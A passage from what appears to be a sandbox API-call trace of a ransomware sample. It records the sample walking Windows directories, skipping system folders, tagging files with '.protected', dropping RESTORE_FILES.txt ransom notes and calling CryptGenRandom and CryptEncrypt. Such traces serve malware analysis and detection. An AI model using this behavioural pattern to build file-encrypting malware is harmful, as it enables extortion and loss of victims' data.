pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.protected") returned 90 [0093.114] StrStrIW (lpFirst="Help_MValidator.H1D.protected", lpSrch=".protected") returned=".protected" [0093.114] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.Lck.protected", lpString2="Windows") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.Lck.protected", lpString2="Program Files") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.Lck.protected", lpString2="Program Files (x86)") returned -1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.Lck.protected", lpString2="$Recycle.bin") returned 1 [0093.114] lstrcmpiW (lpString1="Help_MValidator.Lck.protected", lpString2="System Volume Information") returned -1 [0093.114] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.protected") returned 90 [0093.114] StrStrIW (lpFirst="Help_MValidator.Lck.protected", lpSrch=".protected") returned=".protected" [0093.114] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.114] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpString2="Windows") returned -1 [0093.114] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpString2="Program Files") returned -1 [0093.114] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpString2="Program Files (x86)") returned -1 [0093.114] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpString2="$Recycle.bin") returned 1 [0093.114] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpString2="System Volume Information") returned -1 [0093.114] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected") returned 117 [0093.114] StrStrIW (lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected", lpSrch=".protected") returned=".protected" [0093.114] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.114] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.114] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.114] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.114] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.114] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.114] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RESTORE_FILES.txt") returned 78 [0093.114] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.114] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.114] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.114] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.114] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RESTORE_FILES.txt") returned 78 [0093.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.115] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.115] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\RESTORE_FILES.txt") returned 72 [0093.115] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.115] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.115] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.115] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.115] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\RESTORE_FILES.txt") returned 72 [0093.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.115] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.115] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.115] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\RESTORE_FILES.txt") returned 68 [0093.115] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.115] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.115] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.115] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.116] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\RESTORE_FILES.txt") returned 68 [0093.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.116] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.116] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.116] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.116] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.117] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.117] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\RESTORE_FILES.txt") returned 61 [0093.117] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.117] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.117] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.117] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\RESTORE_FILES.txt") returned 61 [0093.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.117] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.118] lstrcmpiW (lpString1="Crypto", lpString2="Windows") returned -1 [0093.118] lstrcmpiW (lpString1="Crypto", lpString2="Program Files") returned -1 [0093.118] lstrcmpiW (lpString1="Crypto", lpString2="Program Files (x86)") returned -1 [0093.118] lstrcmpiW (lpString1="Crypto", lpString2="$Recycle.bin") returned 1 [0093.118] lstrcmpiW (lpString1="Crypto", lpString2="System Volume Information") returned -1 [0093.118] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto") returned 39 [0093.118] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0093.118] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0093.118] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*") returned 41 [0093.118] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.118] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.118] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.118] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.118] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.118] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.118] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\.") returned 41 [0093.118] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.118] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.118] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.118] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.118] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.118] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.118] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.118] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\..") returned 42 [0093.118] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.119] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.119] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.119] lstrcmpiW (lpString1="DSS", lpString2="Windows") returned -1 [0093.119] lstrcmpiW (lpString1="DSS", lpString2="Program Files") returned -1 [0093.119] lstrcmpiW (lpString1="DSS", lpString2="Program Files (x86)") returned -1 [0093.119] lstrcmpiW (lpString1="DSS", lpString2="$Recycle.bin") returned 1 [0093.119] lstrcmpiW (lpString1="DSS", lpString2="System Volume Information") returned -1 [0093.119] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned 43 [0093.119] lstrcmpW (lpString1="DSS", lpString2=".") returned 1 [0093.119] lstrcmpW (lpString1="DSS", lpString2="..") returned 1 [0093.119] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*") returned 45 [0093.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.119] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.119] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.119] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.119] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.119] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.119] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\.") returned 45 [0093.119] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.120] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.120] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.120] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.120] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.120] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.120] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.120] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\..") returned 46 [0093.120] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.120] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.120] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.120] lstrcmpiW (lpString1="MachineKeys", lpString2="Windows") returned -1 [0093.120] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files") returned -1 [0093.120] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files (x86)") returned -1 [0093.120] lstrcmpiW (lpString1="MachineKeys", lpString2="$Recycle.bin") returned 1 [0093.120] lstrcmpiW (lpString1="MachineKeys", lpString2="System Volume Information") returned -1 [0093.120] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 55 [0093.120] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1 [0093.120] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1 [0093.120] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned 57 [0093.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.120] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.120] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.120] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.120] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.120] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.121] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\.") returned 57 [0093.121] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.121] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.121] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.121] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.121] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.121] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.121] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.121] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\..") returned 58 [0093.121] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.121] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.121] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.121] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\RESTORE_FILES.txt") returned 73 [0093.121] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.121] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.121] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.121] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.121] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\RESTORE_FILES.txt") returned 73 [0093.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.121] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.121] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.121] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\RESTORE_FILES.txt") returned 61 [0093.121] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.122] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.122] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.122] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.122] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\RESTORE_FILES.txt") returned 61 [0093.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.123] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.123] lstrcmpiW (lpString1="Keys", lpString2="Windows") returned -1 [0093.123] lstrcmpiW (lpString1="Keys", lpString2="Program Files") returned -1 [0093.123] lstrcmpiW (lpString1="Keys", lpString2="Program Files (x86)") returned -1 [0093.123] lstrcmpiW (lpString1="Keys", lpString2="$Recycle.bin") returned 1 [0093.123] lstrcmpiW (lpString1="Keys", lpString2="System Volume Information") returned -1 [0093.123] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned 44 [0093.123] lstrcmpW (lpString1="Keys", lpString2=".") returned 1 [0093.123] lstrcmpW (lpString1="Keys", lpString2="..") returned 1 [0093.123] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*") returned 46 [0093.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.123] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.123] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.123] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.123] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.123] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.123] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\.") returned 46 [0093.123] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.123] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.123] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.123] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.123] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\." (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.123] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.124] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.124] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.124] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.124] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.124] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.124] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\..") returned 47 [0093.124] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.124] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.124] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.124] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.124] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.124] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\.." (normalized: "c:\\users\\all users\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.124] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.124] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.124] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.124] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.124] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.124] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.124] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\RESTORE_FILES.txt") returned 62 [0093.124] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.124] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.124] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.124] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.125] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\RESTORE_FILES.txt") returned 62 [0093.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.125] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.125] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.125] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 